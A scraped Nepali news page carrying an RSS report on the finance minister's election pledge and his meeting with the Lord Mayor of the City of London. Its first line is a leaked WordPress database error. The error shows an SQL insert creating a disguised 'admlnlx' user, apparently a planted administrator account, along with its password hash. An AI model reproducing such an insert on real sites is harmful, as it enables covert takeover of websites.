WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BoCnVZ0ggdVDdPVW31ITTcy6xiFH73.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 03:53:21', '', 'admlnlx', 'admlnlx')
काठमान्डौं, माघ ११-
उपप्रधानमन्त्री तथा अर्थमन्त्री कृष्णबहादुर महराले सरकार एक वर्षभित्र तीनवटै तहको निर्वाचन गरिसक्ने तयारीमा अगाडि बढेको बताउनुभएको छ ।
नेपालको औपचारिक भ्रमणमा रहनुभएका बेलायतका लर्ड मेयर सिटी अफ लन्डन डा एन्ड्रयु पार्मलीसँगको आजको भेटमा उहाँले संविधानको कार्यान्वयनका क्रममा निर्वाचनलाई सरकारले विशेष प्राथमिकतामा राखेको बताउनुभयो ।
अर्थमन्त्री महरा र पार्मलीबीच नेपाल र बेलायतबीच रहँदै आएको आत्मीय सम्बन्धलाई अझ प्रगाढ बनाउने विषयमा छलफल भएको अर्थमन्त्रीका प्रेस संयोजक त्रिभुवन पौडेलले जानकारी दिनुभयो । सो अवसरमा अर्थमन्त्री महराले बेलायत सरकारबाट रहँदै आएको सहयोगप्रति धन्यवाद व्यक्त गर्दै आगामी दिनमा सहयोगलाई निरन्तरता दिन आग्रह गर्नुभएको थियो ।
जवाफमा लर्ड मेयरले नेपालको सद्भावप्रति आभार व्यक्त गर्दै संविधान कार्यान्वयन गर्दै शान्तिप्रक्रिया टुङ्ग्याउनका लागि बेलायत सरकारले सहयोग गर्ने प्रतिबद्धता व्यक्त गर्नुभएको थियो । -रासस